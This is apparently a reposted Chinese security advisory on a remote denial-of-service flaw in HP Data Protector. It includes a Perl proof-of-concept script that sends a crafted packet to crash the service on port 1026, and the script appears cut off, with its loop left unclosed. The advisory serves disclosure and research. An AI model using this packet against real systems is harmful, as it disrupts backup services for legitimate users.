HP Data Protector Manager远程拒绝服务漏洞
发布日期:2010-12-01
更新日期:2010-12-02
受影响系统:HP Data Protector A.06.11.0000
描述:
BUGTRAQ ID:
45128
HP Data Protector软件是企业环境中单个服务器自动备份和恢复的软件,支持磁盘存储或磁带存储目标。
HP Data Protector在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞导致受影响的应用程序崩溃,拒绝服务合法用户。
此漏洞源于空指针引用导致的内存访问错误,造成远程拒绝服务。
<*来源:Pepelux (
pepelux@enye-sec.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Pepelux (
pepelux@enye-sec.com)提供了如下测试方法:
use IO::Socket;
my ($server, $port) = @ARGV ;
unless($ARGV[0] || $ARGV[1]) {
print "Usage: perl $0 <host> [port]\n";
print "\tdefault port = 1026\n\n";
exit 1;
}
$port = 1026 if ($ARGV[0]);
my $buf = "\x00\x00\x00\x43\xfe\xff\x00\x32\x00\x36\x00\x37\x00\x00\x41\x41".
"\x00\x31\x00\x00\x42\x42\x00\x31\x00\x00\x43\x43\x00\x31\x00\x00".
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44".
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44".
"\xab\x7b\xde\x7c\x46\x4f\x4f";
print "[+] Connecting to $server:$port ...\n";
my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");
while(1) {
print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n";
exit;
建议:
厂商补丁:
HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://itrc.hp.com浏览次数:1905
严重程度:0(网友投票)
